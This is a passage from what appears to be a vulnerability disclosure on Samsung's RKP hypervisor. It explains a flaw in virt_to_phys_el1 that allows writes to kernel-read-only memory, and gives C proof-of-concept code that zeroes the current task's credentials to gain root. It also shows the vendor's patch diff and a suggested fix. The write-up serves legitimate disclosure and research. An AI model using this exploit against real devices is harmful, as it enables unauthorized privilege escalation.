ats12e1r(addr);
isb();
par_el1 = get_par_el1();
// Check the PAR_EL1 register to see if the AT succeeded.
if ((par_el1 & 1) != 0) {
// Try again to translate the VA using the AT S12E1W instruction (simulate a kernel write).
ats12e1w(addr);
isb();
par_el1 = get_par_el1();
}
cs_exit(s2_lock);
// Check the PAR_EL1 register to see if the AT succeeded.
if ((par_el1 & 1) != 0) {
isb();
// If the MMU is enabled, log and print the stack contents (only once).
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
if (!dword_87035098) {
dword_87035098 = 1;
print_stack_contents();
}
dword_87035098 = 0;
}
return 0;
}
// If the AT succeeded, return the output PA.
else {
return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
}
}
The issue is that functions will call virt_to_phys_el1
to convert a kernel VA, sometimes to read from it, other times to write to it. However, since virt_to_phys_el1
still translates the VA even if it is only readable, we can abuse this oversight to write to memory that is read-only from the kernel.
Interesting targets in kernel memory include anything that is read-only in the stage 2, such as the kernel page tables, struct cred
, struct task_security_struct
, etc. We also need to find a command handler that uses the virt_to_phys_el1
function, writes to the translated address, and can be called after the hypervisor is fully initialized. There are only two command handlers that fit the bill:
- rkp_cmd_rkp_robuffer_alloc, which writes the address of the newly allocated page;

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
page = page_allocator_alloc_page();
ret_va = regs->x2;
// ...
if (ret_va) {
// ...
*virt_to_phys_el1(ret_va) = page;
}
regs->x0 = page;
return 0;
}
- rkp_cmd_dynamic_load, which writes the return code of the subcommand.

int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
// ...
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
// ...
} else {
res = 0;
}
ret_va = regs->x4;
if (ret_va) {
*virt_to_phys_el1(ret_va) = res;
}
regs->x0 = res;
return res;
}
In our exploit, we have used rkp_cmd_dynamic_load
because when an invalid subcommand is specified, the return code and thus the value that is written to the target address is 0. This is very useful, for example, to change a UID/GID to 0 (root
).
#define UH_APP_RKP 0xC300C002
#define RKP_DYNAMIC_LOAD 0x20
void print_ids() {
uid_t ruid, euid, suid;
getresuid(&ruid, &euid, &suid);
printf("Uid: %d %d %d\n", ruid, euid, suid);
gid_t rgid, egid, sgid;
getresgid(&rgid, &egid, &sgid);
printf("Gid: %d %d %d\n", rgid, egid, sgid);
}
void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}
void exploit() {
/* print the old credentials */
print_ids();
/* get the struct cred of the current task */
uint64_t current = kernel_get_current();
uint64_t cred = kernel_read(current + 0x7B0);
/* allocate the argument structure */
uint64_t rkp_dyn_p = kernel_alloc(0x38);
/* zero the fields of the struct cred */
for (int i = 4; i < 0x24; i += 4)
write_zero(rkp_dyn_p, cred + i);
/* print the new credentials */
print_ids();
}
Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0
By running the proof of concept, we can see that the current task's credentials changed from 2000 (shell
) to 0 (root
).
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.
Here is the immediate remediation step that we suggested to Samsung:
- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
Changes were made to the rkp_cmd_rkp_robuffer_alloc
function. It now ensures the kernel-provided address is marked as FREE
in the physmap
before writing to it and triggers a policy violation if it isn't.
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
// ...
page = page_allocator_alloc_page();
ret_va = regs->x2;
// ...
if (ret_va) {
// ...
- *virt_to_phys_el1(ret_va) = page;
+ ret_pa = virt_to_phys_el1(ret_va);
+ rkp_phys_map_lock(ret_pa);
+ if (!is_phys_map_free(ret_pa)) {
+ rkp_phys_map_unlock(ret_pa);
+ rkp_policy_violation("RKP_07fb818a");
+ }
+ *ret_pa = page;
+ rkp_phys_map_unlock(ret_pa);
}
regs->x0 = page;
return 0;
}
Similar changes were made to the rkp_cmd_dynamic_load
function.
int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
// ...
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
// ...
} else {
res = 0;
}
ret_va = regs->x4;
- if (ret_va)
- *virt_to_phys_el1(ret_va) = res;
+ if (ret_va) {
+ ret_pa = rkp_get_pa(ret_va);
+ rkp_phys_map_lock(ret_pa);
+ if (!is_phys_map_free(ret_pa)) {
+ rkp_phys_map_unlock(ret_pa);
+ rkp_policy_violation("RKP_07fb818a");
+ }
+ rkp_phys_map_unlock(ret_pa);
+ *ret_pa = res;
+ }
regs->x0 = res;
return res;
}
The patch works right now because there are no other command handlers accessible after initialization that use virt_to_phys_el1
before writing to the address, but it only fixes the exploitation paths and not the root cause. It is possible that in the future, when a new command handler is added, the physmap
check will be forgotten and the vulnerability thus reintroduced. Furthermore, the patch also assumes that memory that is read-only from the kernel will never be marked as FREE
. While this holds true for now, it might change in the future as well.
A better solution would have been to add a flag specifying whether read or write access should be checked as an argument to the virt_to_phys_el1
function.
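For illustration, here is a minimal sketch of what such a variant could look like, based on the decompiled virt_to_phys_el1 shown earlier. The function name, the flag values, and the omission of the logging path are our own choices and not Samsung's implementation.
#define TRANSLATE_READ  0
#define TRANSLATE_WRITE 1

/* Sketch only: translate a kernel VA for a specific access type, instead of
 * falling back from a read translation to a write translation. */
uint64_t virt_to_phys_el1_access(uint64_t addr, uint32_t access) {
  uint64_t par_el1;
  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  /* Simulate the exact access that the caller intends to perform. */
  if (access == TRANSLATE_WRITE) {
    ats12e1w(addr);
  } else {
    ats12e1r(addr);
  }
  isb();
  par_el1 = get_par_el1();
  cs_exit(s2_lock);
  /* PAR_EL1.F (bit 0) is set if the address translation failed. */
  if ((par_el1 & 1) != 0) {
    return 0;
  }
  return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
}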
To conclude, we would like to share our thoughts about Samsung RKP and its implementation as of early 2021.
With regard to the implementation, the codebase has been around for a few years already, and it shows. Complexity increased as new features were added, and bug patches had to be made here and there. This might explain how mistakes like the ones revealed today could have been made and why configuration issues happen so frequently. It is very likely that there are other bugs lurking in the code that we have glossed over. In addition, we feel that Samsung has made some strange choices, both in the design process and in their bug patches. For example, duplicating information that is already in the stage 2 page tables (such as the S2AP
bit and the ro_bitmap
) is very error-prone. They also seem to be patching specific exploitation paths instead of the root cause of vulnerabilities, which is kind of a red flag.
Leaving these flaws aside for a moment and considering the overall impact of Samsung RKP on device security, we believe that it does contribute a little bit to making the device more secure as a defense-in-depth measure. It makes it harder for an attacker to achieve code execution in the kernel. However, it is certainly not a panacea. When writing an Android kernel exploit, an attacker will need to find an RKP bypass (which is different from a vulnerability in RKP) to compromise the system. Unfortunately, there are known bypasses that still need to be addressed by Samsung.
SVE-2021-20178
SVE-2021-20179
SVE-2021-20176